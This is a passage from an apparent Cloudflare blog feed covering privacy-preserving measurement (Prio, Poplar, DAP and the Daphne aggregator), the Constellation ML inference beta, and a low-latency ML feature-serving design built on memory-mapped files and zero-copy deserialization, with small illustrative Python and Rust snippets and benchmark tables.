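x = sum(s[0] for s in honest + [malicious]) % Q
y = sum(s[1] for s in honest + [malicious]) % Q
print((x + y) % Q)  # the "sum" is now garbage: 1000000000000008
```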
    <div>
      <h3>Non-linear aggregation</h3>
      <a href="#non-linear-aggregation">
        
      </a>
    </div>
    <p>There are a variety of aggregation tasks for which Prio is not well-suited, in particular those that are non-linear. One such task is to find the "heavy hitters" among the set of measurements. The heavy hitters are the subset of the measurements that occur most frequently, say at least \( t \) times for some threshold \( t \). For example, the measurements might be the URLs visited on a given day by users of a web browser; the heavy hitters would be the set of URLs that were visited by at least \( t \) users.</p><p>This computation can be expressed as a simple program:</p>
            <pre><code>from collections import defaultdict

def heavy_hitters(measurements: list[bytes], t: int) -&gt; set[bytes]:
    # Count how many times each measurement occurs.
    counts = defaultdict(int)
    for measurement in measurements:
        counts[measurement] += 1
    # Keep only the measurements that occur at least t times.
    return {m for m, count in counts.items() if count &gt;= t}</code></pre>
            <p>However, it cannot be expressed as a linear function, at least not efficiently (i.e., in sub-exponential space), and a linear function is exactly what we would need in order to perform this computation on secret-shared measurements.</p><p>In order to enable non-linear computation on secret shared data, it is necessary to introduce some form of interaction. There are a few possibilities. For the heavy hitters problem in particular, Henry Corrigan-Gibbs and others devised a protocol called <a href="https://ieeexplore.ieee.org/document/9519492">Poplar</a> (IEEE Security &amp; Privacy 2021) in which several rounds of aggregation and unsharding are performed, where in each round, information provided by the collector is used to "query" the measurements to obtain a refined aggregate result.</p>
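<p>With the cryptography stripped away, Poplar's round structure resembles level-by-level prefix counting with pruning: in each round the collector only queries the children of prefixes that were already heavy. The sketch below is only meant to convey that idea, not the protocol itself:</p>

```python
from collections import Counter

def heavy_hitters_by_prefix(measurements: list[str], t: int, length: int) -> set[str]:
    """Find strings occurring at least t times by refining prefixes round by round."""
    candidates = {""}  # the empty prefix is trivially heavy
    for level in range(1, length + 1):
        # Only count extensions of prefixes that survived the previous round;
        # in Poplar, each such count is computed on secret-shared data.
        counts = Counter(m[:level] for m in measurements
                         if m[:level - 1] in candidates)
        candidates = {p for p, c in counts.items() if c >= t}
    return candidates

urls = ["abc", "abd", "abc", "abc", "xyz", "abd"]
print(sorted(heavy_hitters_by_prefix(urls, 2, 3)))  # ['abc', 'abd']
```

<p>The pruning is what keeps the work sub-exponential: candidates that can no longer reach the threshold are discarded before the next round.</p>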
    <div>
      <h3>Helping to build a world of multi-party computation</h3>
      <a href="#helping-to-build-a-world-of-multi-party-computation">
        
      </a>
    </div>
    <p>Protocols like Prio or Poplar that enable computation over secret shared data fit into a rich tradition in cryptography known as <i>multi-party computation (MPC)</i>. MPC is at once an active research area in theoretical computer science and a class of protocols that are beginning to see real-world use—in our case, to minimize the amount of privacy-sensitive information we collect in order to keep the Internet moving.</p><p>The PPM working group at IETF represents a significant effort, by Cloudflare and others, to standardize MPC techniques for privacy preserving measurement. This work has three main prongs:</p><ol><li><p>To identify the types of problems that need to be solved.</p></li><li><p>To provide cryptography researchers from academia, industry, and the public sector with "templates" for solutions that we know how to deploy. One such template is called a <a href="https://datatracker.ietf.org/doc/draft-irtf-cfrg-vdaf/">"Verifiable Distributed Aggregation Function (VDAF)"</a>, which specifies a kind of "API boundary" between protocols like Prio and Poplar and the systems that are built around them. Cloudflare Research is leading development of the standard, contributing to <a href="https://github.com/divviup/libprio-rs">implementations</a>, and providing <a href="https://petsymposium.org/popets/2023/popets-2023-0126.pdf">security analysis</a>.</p></li><li><p>To provide a deployment roadmap for emerging protocols. <a href="https://datatracker.ietf.org/doc/draft-ietf-ppm-dap/">DAP</a> is one such roadmap: it specifies execution of a generic VDAF over HTTPS and attends to the various operational considerations that arise as deployments progress. As well as contributing to the standard itself, Cloudflare has developed its own implementation designed for our own infrastructure (see below).</p></li></ol><p>The IETF is working on its first set of drafts (DAP/VDAF). 
These drafts are mature enough to deploy, and a number of deployments are scaling up as we speak. Our hope is that we have initiated a positive feedback loop between theorists and practitioners: as new cryptographic techniques emerge, more practitioners will begin to work with them, which will lead to identifying new problems to solve, leading to new techniques, and so on.</p>
    <div>
      <h3>Daphne: Cloudflare’s implementation of a DAP Aggregation Server</h3>
      <a href="#daphne-cloudflares-implementation-of-a-dap-aggregation-server">
        
      </a>
    </div>
    <p>Our emerging technology group has been working on <a href="https://github.com/cloudflare/daphne">Daphne</a>, our Rust-based implementation of a DAP aggregator server. This is only half of a deployment – the DAP architecture requires two interoperating aggregator servers, each operated by a different party. Our current version only implements the DAP Helper role; the other role is the DAP Leader. Plans are in the works to implement the Leader as well, which will allow us to deploy Daphne for more use cases.</p><p>We made two big decisions in our implementation here: using Rust and using Workers. Rust has been skyrocketing in popularity in the past few years due to its performance and memory management – a favorite of cryptographers for similar reasons. <a href="https://workers.cloudflare.com/">Workers</a> is Cloudflare’s serverless execution environment that allows developers to easily deploy applications globally across our network – making it a favorite tool to prototype with at Cloudflare. This allows for easy integration with our Workers-based storage solutions: <a href="https://developers.cloudflare.com/durable-objects/">Durable Objects</a>, which we’re using for storing various data artifacts as required by the DAP protocol; and <a href="https://www.cloudflare.com/developer-platform/workers-kv/">KV</a>, which we’re using for managing aggregation task configuration. We’ve learned a lot from our interop tests and deployment, which has helped improve our own Workers products and which we have also fed back into the PPM working group to help improve the DAP standard.</p><p>If you’re interested in learning more about Daphne or collaborating with us in this space, you can fill out <a href="https://www.cloudflare.com/lp/privacy-edge/">this form</a>. If you’d like to get involved in the DAP standard, you can check out the <a href="https://datatracker.ietf.org/wg/ppm/about/">working group</a>.</p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Privacy]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Research]]></category>
            <guid isPermaLink="false">2vQ2io72Fczi8H9Eh8HrWF</guid>
            <dc:creator>Christopher Patton</dc:creator>
            <dc:creator>Mari Galicer</dc:creator>
        </item>
        <item>
            <title><![CDATA[Globally distributed AI and a Constellation update]]></title>
            <link>https://blog.cloudflare.com/globally-distributed-ai-and-a-constellation-update/</link>
            <pubDate>Thu, 22 Jun 2023 13:00:05 GMT</pubDate>
            <description><![CDATA[ Today we’re announcing new Constellation features, explaining why it’s the first globally distributed AI platform, and why deploying your machine learning tasks in our global network is advantageous. ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/d7mzaMT9WUUuX6PKMqP0o/f33c7430024dca3b9eeb0b65b8ee4d21/image2-27.png" />
            
            </figure><p>During Cloudflare's 2023 Developer Week, we announced <a href="/introducing-constellation/">Constellation</a>, a set of APIs that allow everyone to run fast, low-latency inference tasks using pre-trained machine learning/AI models, directly on Cloudflare’s network.</p>
    <div>
      <h3>Constellation update</h3>
      <a href="#constellation-update">
        
      </a>
    </div>
    <p>We now have a few thousand accounts onboarded in the Constellation private beta and have been listening to our customers' feedback to evolve and improve the platform. Today, one month after the announcement, we are upgrading Constellation with three new features:</p><p><b>Bigger models</b>: We are increasing the size limit of your models from 10 MB to 50 MB. While still somewhat conservative during the private beta, this new limit opens doors to more pre-trained and optimized models you can use with Constellation.</p><p><b>Tensor caching</b>: When you run a Constellation inference task, you pass multiple tensor objects as inputs, sometimes creating big data payloads. These inputs travel over the wire back and forth when you repeat the same task, even when the changes in input between runs are minimal, creating unnecessary network and data-parsing overhead.</p><p>The client API now supports caching input tensors, resulting in lower network latency and faster inference times.</p><p><b>XGBoost runtime</b>: Constellation started with the ONNX runtime, but our vision is to support multiple runtimes under a common API. Today we're adding the XGBoost runtime to the list.</p><p><a href="https://xgboost.ai/">XGBoost</a> is an optimized distributed gradient boosting library designed to be highly efficient, flexible, and portable, and it's known for its performance on structured and tabular data tasks.</p><p>You can start uploading and using XGBoost models today.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1KCtc0U75hfGd2cztvKt2H/89eda58cb5e59d749cfe84549fde59af/SRYFZbgQfXB60T7k7-Fj0PAP3cWbivZm6oU_jQFzoDbQQSF4IHkCmfugCHSHLwL4_pfE6-tlYfgHrsNg7Z5z5JLvjlUp8aPOiXPVHqGOT_mfAVgB70rn8_QxvekK.png" />
            
            </figure><p>You can find the updated documentation with these new features and an example on how to use the XGBoost runtime with Constellation in our <a href="https://developers.cloudflare.com/constellation">Developers Documentation</a>.</p>
    <div>
      <h3>An era of globally distributed AI</h3>
      <a href="#an-era-of-globally-distributed-ai">
        
      </a>
    </div>
    <p>Since Cloudflare’s network is globally distributed, Constellation is our first public release of globally distributed machine learning.</p><p>But what does this mean? You may not think of a global network as the place to deploy your machine learning tasks, but machine learning has been a core part of what’s enabled much of Cloudflare’s core functionality for many years. And we run it across our <a href="https://www.cloudflare.com/network/">global network in 300 cities</a>.</p><p>Is this large spike in traffic an attack or a Black Friday sale? What’s going to be the best way to route this request based on current traffic patterns? Is this request coming from a human or a bot? Is this HTTP traffic a zero-day? Being able to answer these questions using automated <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">machine learning</a> and <a href="https://www.cloudflare.com/learning/ai/what-is-artificial-intelligence/">AI</a>, rather than human intervention, is one of the things that’s enabled Cloudflare to scale.</p><p>But this is just a small sample of what globally distributed machine learning enables. The reason this was so helpful for us is that we were able to run this machine learning as an integrated part of our stack, which is why we’re now in the process of opening it up to more and more developers with Constellation.</p><p>As Michelle Zatlyn, our co-founder, likes to say, we’re just getting started (in this space) — every day we’re adding hundreds of new users to our <a href="/introducing-constellation/">Constellation beta</a>, testing out and globally deploying new models, and beyond that, deploying new hardware to support the new types of workloads that <a href="https://www.cloudflare.com/learning/ai/what-is-artificial-intelligence/">AI</a> will bring to our global network.</p><p>With that, we wanted to share a few announcements and some use cases that help illustrate why we’re so excited about globally distributed AI. 
And since it’s Speed Week, it should be no surprise that, well, speed is at the crux of it all.</p>
    <div>
      <h3>Custom tailored web experiences, powered by AI</h3>
      <a href="#custom-tailored-web-experiences-powered-by-ai">
        
      </a>
    </div>
    <p>We’ve long known about the importance of performance when it comes to web experiences — in e-commerce, every second of page load time can have as much as a 7% drop off effect on conversion. But being fast is not enough. It’s necessary, but not sufficient. You also have to be accurate.</p><p>That is, rather than serving one-size-fits-all experiences, users have come to expect that you know what they want before they do.</p><p>So you have to serve personalized experiences, and you have to do it fast. That’s where Constellation can come into play. With Constellation, as a part of your e-commerce application that may already be served from Cloudflare’s network through Workers or Pages, or even store data in <a href="https://developers.cloudflare.com/d1/">D1</a>, you can now perform tasks such as categorization (what demographic is this customer most likely in?) and personalization (if you bought this, you may also like that).</p>
    <div>
      <h3>Making devices smarter wherever they are</h3>
      <a href="#making-devices-smarter-wherever-they-are">
        
      </a>
    </div>
    <p>Another use case where performance is critical is in interacting with the real world. Imagine a face recognition system that verifies your identity every time you go into your house. Every second of latency makes a difference (especially if you’re holding heavy groceries).</p><p>Running inference on Cloudflare’s network means that, for 95% of the world’s population, compute, and thus a decision, is never more than 50ms away. This is in huge contrast to centralized compute: if you live in Europe but bought a doorbell system from a US-based company, you may be hundreds of milliseconds away, round trip.</p><p>You may be thinking, why not just run the compute on the device then?</p><p>For starters, running inference on the device doesn’t guarantee fast performance. Most devices with built-in intelligence run on microcontrollers, often with limited computational abilities (not a high-end GPU or server-grade CPU). Milliseconds become seconds; depending on the volume of workloads you need to process, local inference might not be suitable. The compute that can be fit on devices is simply not powerful enough for high-volume complex operations, certainly not for operating at low latency.</p><p>But even user experience aside (some devices don’t interface with a user directly), there are other downsides to running compute directly on devices.</p><p>The first is battery life — the longer the compute, the shorter the battery life. There's always a power consumption hit, even if you have a custom <a href="https://en.wikipedia.org/wiki/Application-specific_integrated_circuit">ASIC chip</a> or a Tensor Processing Unit (<a href="https://en.wikipedia.org/wiki/Tensor_Processing_Unit">TPU</a>), meaning shorter battery life if that's one of your constraints. For consumer products, this means having to switch out your doorbell battery (lest you get locked out). 
For operating fleets of devices at scale (imagine watering devices in a field), this means the cost of monitoring and swapping out batteries.</p><p>Lastly, device hardware, and even software, is harder to update. As new technologies or more efficient chips become available, upgrading fleets of hundreds or thousands of devices is challenging. And while software updates may be easier to manage, they’ll never be as easy as updating on-cloud software, where you can effortlessly ship updates multiple times a day!</p><p>Speaking of shipping software…</p>
    <div>
      <h3>AI applications, easier than ever with Constellation</h3>
      <a href="#ai-applications-easier-than-ever-with-constellation">
        
      </a>
    </div>
    <p>Speed Week is not just about making your applications or devices faster, but also your team!</p><p>For the past six years, our developer platform has been making it easy for developers to ship new code with Cloudflare Workers. With Constellation, it’s now just as easy to add Machine Learning to your existing application, with just a few commands.</p><p>And if you don’t believe us, don’t just take our word for it. We’re now in the process of opening up the beta to more and more customers. To request access, head on over to the Cloudflare Dashboard where you’ll see a new tab for Constellation. We encourage you to check out <a href="https://developers.cloudflare.com/constellation/get-started/first-constellation-worker/">our tutorial</a> for getting started with Constellation — this AI thing may be even easier than you expected it to be!</p>
    <div>
      <h3>We’re just getting started</h3>
      <a href="#were-just-getting-started">
        
      </a>
    </div>
    <p>This is just the beginning of our journey for helping developers build AI driven applications, and we’re already thinking about what’s next.</p><p>We look forward to seeing what you build, and hearing your feedback.</p> ]]></content:encoded>
            <category><![CDATA[Speed Week]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">38XFu6bOuh2W9Z5jgDbZis</guid>
            <dc:creator>Rita Kozlov</dc:creator>
            <dc:creator>Celso Martinho</dc:creator>
        </item>
        <item>
            <title><![CDATA[Every request, every microsecond: scalable machine learning at Cloudflare]]></title>
            <link>https://blog.cloudflare.com/scalable-machine-learning-at-cloudflare/</link>
            <pubDate>Mon, 19 Jun 2023 13:00:51 GMT</pubDate>
            <description><![CDATA[ We'll describe the technical strategies that have enabled us to expand the number of machine learning features and models, all while substantially reducing the processing time for each HTTP request on our network ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7ezkO9JuKoLVAFi0ynmBfc/57b5f4032ff2789953cabb7f60c3a9ea/image7-3.png" />
            
            </figure><p>In this post, we will take you through the advancements we've made in our <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">machine learning</a> capabilities. We'll describe the technical strategies that have enabled us to expand the number of machine learning features and models, all while substantially reducing the processing time for each HTTP request on our network. Let's begin.</p>
    <div>
      <h2>Background</h2>
      <a href="#background">
        
      </a>
    </div>
    <p>For a comprehensive understanding of our evolved approach, it's important to grasp the context within which our machine learning detections operate. Cloudflare, on average, serves over <b>46 million HTTP requests per second</b>, surging to more than 63 million requests per second during peak times.</p><p>Machine learning detection plays a crucial role in ensuring the security and integrity of this vast network. In fact, it classifies the largest volume of requests among all our detection mechanisms, providing the final <a href="https://developers.cloudflare.com/bots/concepts/bot-score/">Bot Score</a> decision for <b>over 72%</b> of all HTTP requests. Beyond that, we run several machine learning models in shadow mode for every HTTP request.</p><p>At the heart of our machine learning infrastructure lies our reliable ally, <a href="https://catboost.ai/">CatBoost</a>. It enables ultra low-latency model inference and ensures high-quality predictions to detect novel threats such as <a href="/machine-learning-mobile-traffic-bots/">stopping bots targeting our customers' mobile apps</a>. However, it's worth noting that <b>machine learning model inference</b> is just one component of the overall latency equation. Other critical components include <b>machine learning feature extraction and preparation</b>. In our quest for optimal performance, we've continuously optimized each aspect contributing to the overall latency of our system.</p><p>Initially, our machine learning models relied on <b>single-request features</b>, such as the presence or value of certain headers. However, given the ease of spoofing these attributes, we evolved our approach. We turned to <b>inter-request features</b> that leverage aggregated information across multiple dimensions of a request in a sliding time window. 
For example, we now consider factors like the number of unique user agents associated with certain request attributes.</p><p>The extraction and preparation of inter-request features were handled by <b>Gagarin</b>, a Go-based feature serving platform we developed. As a request arrived at Cloudflare, we extracted dimension keys from the request attributes. We then looked up the corresponding machine learning features in the <a href="https://github.com/thibaultcha/lua-resty-mlcache">multi-layered cache</a>. If the desired machine learning features were not found in the cache, a <b>memcached "get" request</b> was made to Gagarin to fetch those. Then machine learning features were plugged into CatBoost models to produce detections, which were then surfaced to the customers via Firewall and Workers fields and internally through our <a href="/http-analytics-for-6m-requests-per-second-using-clickhouse/">logging pipeline to ClickHouse</a>. This allowed our data scientists to run further experiments, producing more features and models.</p>
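<p>As a rough sketch of the lookup flow just described (all names here are illustrative, not Cloudflare's actual code): extract a dimension key from the request, check the local cache, and fall back to the feature store — Gagarin, in the real system — on a miss:</p>

```python
from typing import Callable

class FeatureCache:
    """Toy model of the multi-layered lookup described above."""

    def __init__(self, fetch: Callable[[str], dict]):
        self._fetch = fetch               # stand-in for the memcached "get" to Gagarin
        self._cache: dict[str, dict] = {}  # local in-memory layer

    def features_for(self, dimension_key: str) -> dict:
        if dimension_key not in self._cache:       # cache miss -> IPC round trip
            self._cache[dimension_key] = self._fetch(dimension_key)
        return self._cache[dimension_key]

# A fake feature store keyed by, e.g., a combination of request attributes.
store = {"ua:curl|ip:10.0.0.1": {"unique_user_agents": 3.0}}
cache = FeatureCache(lambda key: store.get(key, {}))
print(cache.features_for("ua:curl|ip:10.0.0.1"))  # {'unique_user_agents': 3.0}
```

<p>The features returned by the lookup are what get plugged into the CatBoost models; the cost of the fallback path is exactly what the latency discussion below is about.</p>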
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1TDWrBIkxKHgZk1fjZnBJe/1340bc0dc964dd4b9022708463d91b24/image3-3.png" />
            
</figure><p><i>Previous system design for serving machine learning features over a Unix socket using Gagarin.</i></p><p>Initially, Gagarin exhibited decent latency, with a median of around <b>200 microseconds</b> to serve all machine learning features for given keys. However, as our system evolved and we introduced more features and dimension keys, coupled with increased traffic, the cache hit ratio began to wane. The median latency increased to <b>500 microseconds</b>, and during peak times the latency worsened significantly, with the p99 latency soaring to roughly <b>10 milliseconds</b>. Gagarin underwent extensive low-level tuning, optimization, profiling, and benchmarking. Despite these efforts, we encountered the limits of inter-process communication (IPC) using Unix Domain Socket (UDS), among other challenges, explored below.</p>
    <div>
      <h3>Problem definition</h3>
      <a href="#problem-definition">
        
      </a>
    </div>
    <p>In summary, the previous solution had its drawbacks, including:</p><ul><li><p><b>High tail latency</b>: during peak times, a portion of requests experienced increased latency caused by CPU contention on the Unix socket and the Lua garbage collector.</p></li><li><p><b>Suboptimal resource utilization:</b> CPU and RAM utilization was not optimized to its full potential, leaving fewer resources for other services running on the server.</p></li><li><p><b>Machine learning feature availability</b>: decreased due to memcached timeouts, which resulted in a higher likelihood of false positives or false negatives for a subset of requests.</p></li><li><p><b>Scalability constraints</b>: as we added more machine learning features, we approached the scalability limit of our infrastructure.</p></li></ul><p>Equipped with a comprehensive understanding of the challenges and armed with quantifiable metrics, we ventured into the next phase: seeking a more efficient way to fetch and serve machine learning features.</p>
    <div>
      <h2>Exploring solutions</h2>
      <a href="#exploring-solutions">
        
      </a>
    </div>
    <p>In our quest for more efficient methods of fetching and serving machine learning features, we evaluated several alternatives. The key approaches included:</p><p><b>Further optimizing Gagarin</b>: as we pushed our Go-based memcached server to its limits, we encountered a lower bound on latency reductions. This arose from the synchronization overhead and multiple data copies of IPC over UDS, the serialization/deserialization overheads, as well as the inherent latency of the garbage collector and the performance of hashmap lookups in Go.</p><p><b>Considering Quicksilver</b>: we contemplated using <a href="/tag/quicksilver/">Quicksilver</a>, but the volume and update frequency of machine learning features posed capacity concerns and potential negative impacts on other use cases. Moreover, it uses a Unix socket with the memcached protocol, reproducing the same limitations previously encountered.</p><p><b>Increasing multi-layered cache size:</b> we investigated expanding cache size to accommodate tens of millions of dimension keys. However, the associated memory consumption, due to duplication of these keys and their machine learning features across worker threads, rendered this approach untenable.</p><p><b>Sharding the Unix socket</b>: we considered sharding the Unix socket to alleviate contention and improve performance. Despite showing potential, this approach only partially solved the problem and introduced more system complexity.</p><p><b>Switching to RPC:</b> we explored the option of using RPC for communication between our front-line server and Gagarin. However, since RPC still requires some form of communication bus (such as TCP, UDP, or UDS), it would not significantly change the performance compared to the memcached protocol over UDS, which was already simple and minimalistic.</p><p>After considering these approaches, we shifted our focus towards investigating alternative Inter-Process Communication (IPC) mechanisms.</p>
    <div>
      <h3>IPC mechanisms</h3>
      <a href="#ipc-mechanisms">
        
      </a>
    </div>
    <p>Adopting a <a href="https://en.wikipedia.org/wiki/First_principle">first principles</a> design approach, we questioned: "What is the most efficient low-level method for data transfer between two processes provided by the operating system?" Our goal was to find a solution that would enable the direct serving of machine learning features from memory for corresponding HTTP requests. By eliminating the need to traverse the Unix socket, we aimed to reduce CPU contention, improve latency, and minimize data copying.</p><p>To identify the most efficient IPC mechanism, we evaluated various options available within the Linux ecosystem. We used <a href="https://github.com/goldsborough/ipc-bench">ipc-bench</a>, an open-source benchmarking tool specifically designed for this purpose, to measure the latencies of different IPC methods in our test environment. The measurements were based on sending one million 1,024-byte messages back and forth (i.e., ping-pong) between two processes.</p>
<table>
<thead>
  <tr>
    <th><span>IPC method</span></th>
    <th><span>Avg duration, μs</span></th>
    <th><span>Avg throughput, msg/s</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>eventfd (bi-directional)</span></td>
    <td><span>9.456</span></td>
    <td><span>105,533</span></td>
  </tr>
  <tr>
    <td><span>TCP sockets</span></td>
    <td><span>8.74</span></td>
    <td><span>114,143</span></td>
  </tr>
  <tr>
    <td><span>Unix domain sockets</span></td>
    <td><span>5.609</span></td>
    <td><span>177,573</span></td>
  </tr>
  <tr>
    <td><span>FIFOs (named pipes)</span></td>
    <td><span>5.432</span></td>
    <td><span>183,388</span></td>
  </tr>
  <tr>
    <td><span>Pipe</span></td>
    <td><span>4.733</span></td>
    <td><span>210,369</span></td>
  </tr>
  <tr>
    <td><span>Message Queue</span></td>
    <td><span>4.396</span></td>
    <td><span>226,421</span></td>
  </tr>
  <tr>
    <td><span>Unix Signals</span></td>
    <td><span>2.45</span></td>
    <td><span>404,844</span></td>
  </tr>
  <tr>
    <td><span>Shared Memory</span></td>
    <td><span>0.598</span></td>
    <td><span>1,616,014</span></td>
  </tr>
  <tr>
    <td><span>Memory-Mapped Files</span></td>
    <td><span>0.503</span></td>
    <td><span>1,908,613</span></td>
  </tr>
</tbody>
</table><p>Based on our evaluation, we found that Unix sockets, while taking care of synchronization, were not the fastest IPC method available. The two fastest IPC mechanisms were shared memory and memory-mapped files. Both approaches offered similar performance, with the former using a specific tmpfs volume in /dev/shm and dedicated system calls, while the latter could be stored in any volume, including tmpfs or HDD/SDD.</p>
    <div>
      <h3>Missing ingredients</h3>
      <a href="#missing-ingredients">
        
      </a>
    </div>
    <p>In light of these findings, we decided to employ <a href="https://en.wikipedia.org/wiki/Memory-mapped_file"><b>memory-mapped files</b></a> as the IPC mechanism for serving machine learning features. This choice promised reduced latency, decreased CPU contention, and minimal data copying. However, it did not inherently offer data synchronization capabilities like Unix sockets. Unlike Unix sockets, memory-mapped files are simply files in a Linux volume that can be mapped into memory of the process. This sparked several critical questions:</p><ol><li><p>How could we efficiently fetch an array of hundreds of float features for given dimension keys when dealing with a file?</p></li><li><p>How could we ensure safe, concurrent and frequent updates for tens of millions of keys?</p></li><li><p>How could we avert the CPU contention previously encountered with Unix sockets?</p></li><li><p>How could we effectively support the addition of more dimensions and features in the future?</p></li></ol><p>To address these challenges we needed to further evolve this new approach by adding a few key ingredients to the recipe.</p>
    <div>
      <h2>Augmenting the idea</h2>
      <a href="#augmenting-the-idea">
        
      </a>
    </div>
    <p>To realize our vision of memory-mapped files as a method for serving machine learning features, we needed to employ several key strategies, touching upon aspects like data synchronization, data structure, and deserialization.</p>
    <div>
      <h3>Wait-free synchronization</h3>
      <a href="#wait-free-synchronization">
        
      </a>
    </div>
    <p>When dealing with concurrent data, ensuring safe, concurrent, and frequent updates is paramount. Traditional locks are often not the most efficient solution, especially when dealing with high concurrency environments. Here's a rundown on three different synchronization techniques:</p><p><b>With-lock synchronization</b>: a common approach using mechanisms like mutexes or spinlocks. It ensures only one thread can access the resource at a given time, but can suffer from contention, blocking, and priority inversion, just as evident with Unix sockets.</p><p><b>Lock-free synchronization</b>: this non-blocking approach employs atomic operations to ensure at least one thread always progresses. It eliminates traditional locks but requires careful handling of edge cases and race conditions.</p><p><b>Wait-free synchronization:</b> a more advanced technique that guarantees every thread makes progress and completes its operation without being blocked by other threads. It provides stronger progress guarantees compared to lock-free synchronization, ensuring that each thread completes its operation within a finite number of steps.</p>
<table>
<thead>
  <tr>
    <th></th>
    <th><span>Disjoint Access Parallelism</span></th>
    <th><span>Starvation Freedom</span></th>
    <th><span>Finite Execution Time</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>With lock</span></td>
    <td><span>✗</span></td>
    <td><span>✗</span></td>
    <td><span>✗</span></td>
  </tr>
  <tr>
    <td><span>Lock-free</span></td>
    <td><span>✓</span></td>
    <td><span>✗</span></td>
    <td><span>✗</span></td>
  </tr>
  <tr>
    <td><span>Wait-free</span></td>
    <td><span>✓</span></td>
    <td><span>✓</span></td>
    <td><span>✓</span></td>
  </tr>
</tbody>
</table><p>Our <a href="https://en.wikipedia.org/wiki/Non-blocking_algorithm#Wait-freedom">wait-free</a> data access pattern draws inspiration from <a href="https://www.kernel.org/doc/html/next/RCU/whatisRCU.html">Linux kernel's Read-Copy-Update (RCU) pattern</a> and the <a href="https://github.com/pramalhe/ConcurrencyFreaks/blob/master/papers/left-right-2014.pdf">Left-Right concurrency control technique</a>. In our solution, we maintain two copies of the data in separate memory-mapped files. Write access to this data is managed by a single writer, with multiple readers able to access the data concurrently.</p><p>We store the synchronization state, which coordinates access to these data copies, in a third memory-mapped file, referred to as "state". This file contains an atomic 64-bit integer, which represents an <code><b>InstanceVersion</b></code> and a pair of additional atomic 32-bit variables, tracking the number of active readers for each data copy. The <code><b>InstanceVersion</b></code> consists of the currently active data file index (1 bit), the data size (39 bits, accommodating data sizes up to 549 GB), and a data checksum (24 bits).</p>
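<p>To make the bit arithmetic concrete, here is a sketch of how such a version word can be packed and unpacked. The field order here is illustrative only; <code>mmap-sync</code>'s actual layout may differ.</p>

```rust
/// Sketch of an InstanceVersion-style u64: the active data-file index
/// (1 bit), the data size (39 bits, accommodating up to ~549 GB), and
/// a data checksum (24 bits). Illustrative field order, not
/// necessarily mmap-sync's exact layout.
pub fn pack_version(file_idx: u64, data_size: u64, checksum: u64) -> u64 {
    assert!(file_idx < 2);
    assert!(data_size < (1u64 << 39));
    assert!(checksum < (1u64 << 24));
    file_idx | (data_size << 1) | (checksum << 40)
}

/// Recover (file_idx, data_size, checksum) from the packed word.
pub fn unpack_version(v: u64) -> (u64, u64, u64) {
    (v & 1, (v >> 1) & ((1u64 << 39) - 1), v >> 40)
}
```

<p>Because the whole state fits in one 64-bit word, readers can load it with a single atomic operation and decide which data copy to use, with no lock involved.</p>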
    <div>
      <h3>Zero-copy deserialization</h3>
      <a href="#zero-copy-deserialization">
        
      </a>
    </div>
    <p>To efficiently store and fetch machine learning features, we needed to address the challenge of deserialization latency. Here, <a href="https://en.wikipedia.org/wiki/Zero-copy">zero-copy</a> deserialization provides an answer. This technique reduces the time and memory required to access and use data by directly referencing bytes in the serialized form.</p><p>We turned to <a href="https://rkyv.org/">rkyv</a>, a zero-copy deserialization framework in Rust, to help us with this task. rkyv implements total zero-copy deserialization, meaning no data is copied during deserialization and no work is done to deserialize data. It achieves this by structuring its encoded representation to match the in-memory representation of the source type.</p><p>One of the key features of rkyv that our solution relies on is its ability to access <code><b>HashMap</b></code> data structures in a zero-copy fashion. This is a unique capability among Rust serialization libraries and one of the main reasons we chose rkyv for our implementation. It also has a vibrant <a href="https://discord.gg/65F6MdnbQh">Discord community</a>, eager to offer best-practice advice and accommodate feature requests.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3m6VU5QBUW41ck2SEd9omL/31db11a33dcf7e8a32d2a563138dce09/Screenshot-2023-06-16-at-18.18.02.png" />
            
            </figure><p><a href="https://rkyv.org/feature-comparison.html">Feature comparison: rkyv vs FlatBuffers and Cap'n Proto</a></p>
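<p>To make the zero-copy idea concrete, here is a minimal stdlib-only sketch (a concept illustration, not rkyv's API): float features are written into an aligned buffer, then read back by reinterpreting the bytes in place, with no decode step. It assumes a little-endian target.</p>

```rust
/// A 4-byte-aligned buffer standing in for a memory-mapped region.
#[repr(align(4))]
pub struct Buffer(pub [u8; 12]);

/// Serialize three f32 features so the byte layout matches the
/// in-memory representation (little-endian targets assumed).
pub fn write_features(features: &[f32; 3]) -> Buffer {
    let mut buf = Buffer([0; 12]);
    for (chunk, f) in buf.0.chunks_exact_mut(4).zip(features) {
        chunk.copy_from_slice(&f.to_le_bytes());
    }
    buf
}

/// "Deserialize" by viewing the bytes in place -- no copying, no work.
pub fn view_features(buf: &Buffer) -> &[f32] {
    // Sound here because the buffer is 4-byte aligned and holds exactly
    // three f32s, so the prefix and suffix slices come back empty.
    let (prefix, floats, suffix) = unsafe { buf.0.align_to::<f32>() };
    debug_assert!(prefix.is_empty() && suffix.is_empty());
    floats
}
```

<p>rkyv generalizes this idea to arbitrary structs, including <code>HashMap</code>s, with optional validation via <code>CheckBytes</code>.</p>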
    <div>
      <h2>Enter mmap-sync crate</h2>
      <a href="#enter-mmap-sync-crate">
        
      </a>
    </div>
